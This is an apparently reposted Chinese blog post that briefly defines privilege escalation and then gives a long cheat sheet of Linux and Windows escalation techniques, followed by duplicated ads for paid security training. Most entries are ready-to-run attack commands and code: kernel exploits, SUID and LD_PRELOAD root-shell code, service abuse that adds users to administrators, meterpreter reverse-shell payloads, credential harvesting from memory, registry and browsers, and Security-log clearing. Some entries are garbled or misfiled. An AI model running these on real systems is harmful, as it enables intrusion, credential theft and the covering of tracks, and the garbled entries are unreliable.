什么是网络安全中的权限提升?
在网络安全领域,了解威胁至关重要,而最关键的威胁之一就是特权升级的概念。从本质上讲,权限升级是指攻击者获得通常为高级用户保留的系统权限或功能的情况。
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。
特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
鉴于网络安全不断发展的形势,对特权升级等威胁保持警惕至关重要。它强调了不断更新安全协议、监控系统活动以及确保正确分配和定期审核用户角色和权限的重要性。这样做,组织可以减轻与未经授权的访问相关的风险,并保持对潜在网络对手的强大防御。
现在我们已经熟悉了这个概念,我们将继续研究这个提权概念的117种方法:
117种提权手法
DirtyC0w
域:No
Local Admin: Yes
操作系统: Linux
类型: 0/1 Exploit
方法: gcc -pthread c0w.c -o c0w; ./c0w; passwd; id
批注:https://github.com/firefart/dirtycow
CVE-2016-1531
域:No
Local Admin: Yes
操作系统: Linux
类型: 0/1 Exploit
方法: CVE-2016-1531.sh;id
批注:https://github.com/crypticdante/CVE-2016-1531
Polkit
域:No
Local Admin: Yes
操作系统: Linux
类型: 0/1 Exploit
方法:
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
./2. poc.sh
DirtyPipe
域:No
Local Admin: Yes
操作系统: Linux
类型: 0/1 Exploit
方法:
-
./traitor-amd64 –exploit kernel:CVE-2022-0847
-
Whoami;id
批注:https://github.com/liamg/traitor/releases/tag/v0.0.14
PwnKit
域:No
Local Admin: Yes
操作系统: Linux
类型: 0/1 Exploit
方法:
-
./cve-2021-4034
-
Whoami;id
批注:https://github.com/berdav/CVE-2021-4034
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
ms14_058
域:No
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
-
msf > use exploit/windows/local/ms14_058_track_popup_menu
-
msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id >
-
msf exploit(ms14_058_track_popup_menu) > exploit
Hot Potato
域:No
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
-
命令提示符下:
powershell.exe -nop -ep bypass
-
在Power Shell提示符类型输入:
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
-
在Power Shell提示符类型输入:
Invoke-Tater -Trigger 1 -Command “net localgroup administrators user /add”
-
要确认攻击是否成功,请在 Power Shell 提示符中键入:
net localgroup administrators
批注:https://github.com/Kevin-Robertson/Tater
Intel SYSRET
域:No
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
execute -H -f sysret.exe -a "-pid [pid]"
批注:https://github.com/jajp777/sysret
release版本:https://github.com/jajp777/sysret/tree/master/x64/Release
PrintNightmare
域:Yes
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
https://github.com/outflanknl/PrintNightmare
PrintNightmare 10.10.10.10 exp.dll
Folina
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
https://github.com/JohnHammond/msdt-follina
python3 follina.py -c "notepad"
ALPC
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
https://github.com/riparino/Task_Scheduler_ALPC
RemotePotato0
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
-
sudo ntlmrelayx.py -t ldap://10.0.0.10 –no-wcf-server –escalate-user normal_user
-
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
批注:
ntlmrelayx.py只找到个很相似的:https://github.com/LuemmelSec/ntlmrelayx.py_to_exe
remotepotato:https://github.com/antonioCoco/RemotePotato0/releases/tag/1.2
CVE-2022-26923
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
-
certipy req ‘lab.local/cve$:CVEPassword1234*@10.100.10.13’ -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
-
Rubeus.exe asktgt /user:"目标_sam名称" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_域名" /dc:"域名_CONTROLLER" /show
批注:
rubeus:https://github.com/GhostPack/Rubeus
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
MS14-068
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
批注:
无py版本,exe版本:https://github.com/ianxtianxt/MS14-068
Sudo LD_PRELOAD
域:No
Local Admin: Yes
操作系统: Linux
类型: Injection
方法:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void \_init() {
unsetenv(“LD\_PRELOAD”);
setgid(0);
setuid(0);
system(“/bin/bash”);
}
-
gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
-
sudo LD_RELOAD=tmp/ldreload.so apache2
Abusing File Permission via SUID Binaries – .so injection)
域:No
Local Admin: Yes
操作系统: Linux
类型: Injection
方法:
-
mkdir /home/user/.config
#include <stdio.h>
#include <stdlib.h>
static void inject() \_attribute \_((constructor));
void inject() {
system(“cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash \-p”);
}
-
gcc -shared -o /home/user/.config/libcalc.so -fPIC/home/user/.config/libcalc.c
-
/usr/local/bin/suid-so
id
DLL Injection
域:No
Local Admin: Yes
操作系统: Windows
类型: Injection
方法:
RemoteDLLInjector64
Or
MemJect
Or
https://github.com/tomcarver16/BOF-DLL-Inject
#define PROCESS_NAME "csgo.exe"
Or
RemoteDLLInjector64.exe pid C:\runforpriv.dll
Or
mandllinjection ./runforpriv.dll pid
批注:
remoteDllInjector:https://github.com/Al1ex/RemoteDLLInjector
memject:https://github.com/danielkrupinski/MemJect
Early Bird Injection
域:No
Local Admin: Yes
操作系统: Windows
类型: Injection
方法:
hollow svchost.exe pop.bin
批注:hollow链接https://github.com/m0n0ph1/Process-Hollowing
Process Injection through Memory Section
域:No
Local Admin: Yes
操作系统: Windows
类型: Injection
方法:
sec-shinject PID /path/to/bin
批注:未找到
Abusing Scheduled Tasks via Cron Path Overwrite
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing Scheduled Tasks
方法:
-
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh;
-
chmod +x systemupdate.sh
-
等待一会儿
-
/tmp/bash -p
-
id && whoami
Abusing Scheduled Tasks via Cron Wildcards
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing Scheduled Tasks
方法:
-
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh;
-
touch /home/user/ –checkpoint=1;
-
touch /home/user/ –checkpoint-action=exec=sh\systemupdate.sh
-
等待一会儿
-
/tmp/bash -p
-
id && whoami
Abusing File Permission via SUID Binaries – Symlink)
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing File Permission
方法:
-
su – www-data;
-
nginxed-root.sh /var/log/nginx/error.log;
-
In root user
-
invoke-rc.d nginx rotate >/dev/null 2>&1
Abusing File Permission via SUID Binaries – Environment Variables #1)
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing File Permission
方法:
-
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c;
-
gcc /tmp/services.c -o /tmp/service;
-
export PATH=/tmp:$PATH;
-
/usr/local/bin/sudi-env; id
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
Abusing File Permission via SUID Binaries – Environment Variables #2)
域:No
Local Admin: Yes
操作系统: Linux
类型: Abusing File Permission
方法:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p
DLL Hijacking
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
Windows_dll.c: cmd.exe /k net localgroup administrators user /add
-
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
-
sc stop dllsvc & sc start dllsvc
Abusing Services via binPath
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
sc config daclsvc binpath= "net localgroup administrators user /add"
-
sc start daclsvc
Abusing Services via Unquoted Path
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
msfvenom -p windows/exec CMD=’net localgroup administrators user /add’ -f exe-service -o common.exe
-
common.exe 放在 'C:\Program Files\Unquoted Path Service'.
-
sc start unquotedsvc
Abusing Services via Registry
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t
-
REG_EXPAND_SZ /d c:\temp\x.exe /f
-
sc start regsvc
Abusing Services via Executable File
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
-
sc start filepermsvc
Abusing Services via Autorun
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
In Metasploit (msf > prompt) 类型:use multi/handler
In Metasploit (msf > prompt) 类型:set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) 类型:set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) 类型:run
打开另一个命令提示符并键入:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
program.exe 放在 'C:\Program Files\Autorun Program'.
Abusing Services via AlwaysInstallElevated
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi
Or
SharpUp.exe AlwaysInstallElevated
批注:sharpup链接https://github.com/GhostPack/SharpUp
Abusing Services via SeCreateToken
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
!rmpriv
Abusing Services via SeDebug
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
Conjure-LSASS
Or
syscall_enable_priv 20
Remote Process via Syscalls (HellsGate|Hal操作系统Gate)
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
injectEtwBypass pid
批注:https://github.com/boku7/injectEtwBypass
Escalate With DuplicateTokenEx
域:Yes
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
PrimaryTokenTheft.exe pid
Or
TokenPlaye.exe –impersonate –pid pid
批注:
primarytokenthenft:https://github.com/slyd0g/PrimaryTokenTheft
tokenplaye:https://github.com/S1ckB0y1337/TokenPlayer/releases/tag/v0.8
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
Abusing Services via SeIncreaseBasePriority
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
start /realtime SomeCpuIntensiveApp.exe
批注:
找了一圈,只有这儿有相关内容:https://github.com/gtworek/Priv2Admin
Abusing Services via SeManageVolume
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
只需编译并运行SeManageVolumeAbuse
批注:https://github.com/xct/SeManageVolumeAbuse
Abusing Services via SeRelabel
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
WRITE_OWNER对资源的访问权限,包括文件和文件夹。
Run for privilege escalation
Abusing Services via SeRestore
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
启动具有 SeRestore 权限的 PowerShell/ISE
. -
使用Enable-SeRestorePrivilege 启用权限
. -
将utilman.exe重命名为utilman.old
-
将cmd.exe重命名为utilman.exe
-
锁定控制台并按Win+U
Abuse via SeBackup
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) 输入: set uripath x
In Metasploit (msf > prompt) 输入: run
在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”
并从弹出菜单中选择“创建转储文件”.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
选择复制 Base64 编码字符串
在命令提示符下键入:echo -ne [Base64 String] | Base64-d
Abusing via SeCreatePagefile
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin
批注:https://github.com/MagnetForensics/Hibr2Bin
Abusing via SeSystemEnvironment
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
TrustExec.exe -m exec -c "whoami /priv" -f
批注:两个工具都没找到QAQ
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
Abusing via SeTakeOwnership
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
-
takeown.exe /f "%windir%\system32"
-
icalcs.exe "%windir%\system32" /grant "%username%":F
-
将cmd.exe重命名为utilman.exe
-
锁定控制台并按Win+U
Abusing via SeTcb
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
PSBits
Or
PrivFu
psexec.exe -i -s -d cmd.exe
Abusing via SeTrustedCredManAccess
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Or
CredManBOF
TrustExec.exe -m exec -c "whoami /priv" -f
Abusing tokens via SeAssignPrimaryToken
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
JuicyPotato.exe
Or
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato
Abusing via SeCreatePagefile
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1
批注:wela链接https://github.com/Yamato-Security/WELA
日志伪造工具flog:https://github.com/mingrammer/flog
Certificate Abuse
域:Yes
Local Admin: Yes
操作系统: Windows
类型: Abusing Certificate
方法:
ceritify.exe request /ca:dc.domain.local\DC-CA /template:User…
Rubeus.exe asktgy /user:CORP\itadmin /certificate:C:\cert.pfx /password:password
Password Mining in Memory
域:No
Local Admin: Yes
操作系统: Linux
类型: Enumeration & Hunt
方法:
-
ps -ef | grep ftp;
-
gdp -p ftp_id
-
info proc mappings
-
q
-
dump memory /tmp/mem [start] [end]
-
q
-
strings /tmp/mem | grep passw
Password Mining in Memory
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) 输入: set uripath x
In Metasploit (msf > prompt) 输入: run
在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”
并从弹出菜单中选择“创建转储文件”.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
选择复制 Base64 编码字符串.
在命令提示符下键入: echo -ne [Base64 String] | base64 -d
Password Mining in Registry
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
打开命令并输入:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUsername
在命令提示符下键入:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultPassword
请注意输出中的凭据
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword
-
注意输出中的凭据
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
在命令提示符下键入:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
记下加密的密码并输入:
C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
从输出中记下凭据.
Password Mining in General Events via SeAudit
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1
Password Mining in Security Events via SeSecurity
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
wevtutil cl Security
Startup Applications
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
In Metasploit (msf > prompt) 输入: use multi/handler
In Metasploit (msf > prompt) 输入: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) 输入: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) 输入: run
打开另一个命令提示符并键入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
将 x.exe 放在“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
Password Mining in McAfeeSitelistFiles
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpUp.exe McAfeeSitelistFiles
批注:https://github.com/GhostPack/SharpUp
Password Mining in CachedGPPPassword
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpUp.exe CachedGPPPassword
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
Password Mining in DomainGPPPassword
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpUp.exe domianGPPPassword
Password Mining in KeePass
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
Seatbelt.exe keepass
Or
KeeTheft.exe
批注:
seatbelt:https://github.com/GhostPack/Seatbelt
KeeTheft未找到
Password Mining in WindowsVault
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
Seatbelt.exe WindowsVault
Password Mining in SecPackageCreds
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
Seatbelt.exe SecPackageCreds
Password Mining in PuttyH操作系统tKeys
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
Seatbelt.exe PuttyHostKeys
Password Mining in RDCManFiles
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
Seatbelt.exe RDCManFiles
Password Mining in RDPSavedConnections
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
Seatbelt.exe RDPSavedConnections
Password Mining in MasterKeys
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpDPAPI masterkeys
批注:https://github.com/GhostPack/SharpDPAPI
Password Mining in Browsers
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpWeb.exe all
批注:https://github.com/djhohnstein/SharpWeb/releases/tag/v1.2
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
-
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
-
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
本文转自 [https://mp.weixin.qq.com/s/rwLoK\_fAaHlwRS\_lYEEqHg](https://mp.weixin.qq.com/s/rwLoK_fAaHlwRS_lYEEqHg),如有侵权,请联系删除。
题外话
===
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
* 2023届全国高校毕业生预计达到1158万人,就业形势严峻;
* 国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
![在这里插入图片描述](https://img-blog.csdnimg.cn/0c022a464b484d0684d58025935451d1.png#pic_center)
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
### 网络安全行业特点
1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
![](https://img-blog.csdnimg.cn/img_convert/26521be2a7bffa89e13a95b2c0db3328.png)
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
![](https://img-blog.csdnimg.cn/img_convert/ffb47dd7a8669d315f2bc65f7bd1cfd8.png)
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
### 1.学习路线图
![](https://img-blog.csdnimg.cn/img_convert/1e115f7287fa28ae3c1b8d6c8b62d6dd.png)
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
### 2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
![在这里插入图片描述](https://img-blog.csdnimg.cn/89a263c053a54776bea80840fc355121.jpeg#pic_center)
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />
### 3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
![在这里插入图片描述](https://img-blog.csdnimg.cn/edfe7a745f3b4f739a5734bd1903bfc8.jpeg#pic_center)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />
### 4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
![](https://img-blog.csdnimg.cn/img_convert/bcee6fb527bf6012c1c325d58c06bf26.png)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
